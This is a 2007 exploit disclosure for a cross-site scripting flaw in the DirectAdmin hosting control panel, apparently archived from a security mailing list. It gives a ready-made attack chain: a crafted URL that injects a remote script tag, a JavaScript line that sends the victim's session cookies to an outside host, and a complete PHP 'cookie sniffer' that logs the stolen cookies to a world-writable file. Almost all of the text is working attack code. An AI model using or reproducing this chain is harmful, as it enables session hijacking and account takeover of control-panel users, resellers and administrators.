DirectAdmin Cross Site Scripting XSS Mar 15 2007 11:48PM
Mandr4ke root gmail com
-=[Fusi0n Group]=-

# Script name .....: DirectAdmin
# Script site .....: http://directadmin.com
# Release Date ....: 15/03/2007
# Version .........: All
# Find by .........: Mandr4ke
# Contact .........: Mandr4ke.root[at]gmail.com
# Greetings .......: Fusi0nGroup & DevilTeam & Nof

-----------------------------------------------------------
Exploit: DirectAdmin Cross Site Scripting XSS
-----------------------------------------------------------

#
# All DirectAdmin level: User,Reseller,Admin.
#
# Exploit:
#
# http://localhost:2222/CMD_USER_STATS?RESULT=%3Cscript%20src='http://serv
er.com/script.js'%3E&domain=
#

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.php = CHMOD 777

Source:

<?php
$filename = "cookies.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo ".";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo ".";
exit;
}
}
echo ".";
fclose($handle);
exit;
}
echo ".";
exit;

//Cookie Sniffer by Kacper - DevilTeam

?>

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/script.js

Source:

location.href='http://server.com/script.php?cookie='+escape(document.coo
kie)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

http://server.com/cookies.txt = CHMOD 777

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

#
# PS ..............: Attacker must be authenticated
# Contact .........: Mandr4ke.root[at]gmail.com
#

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus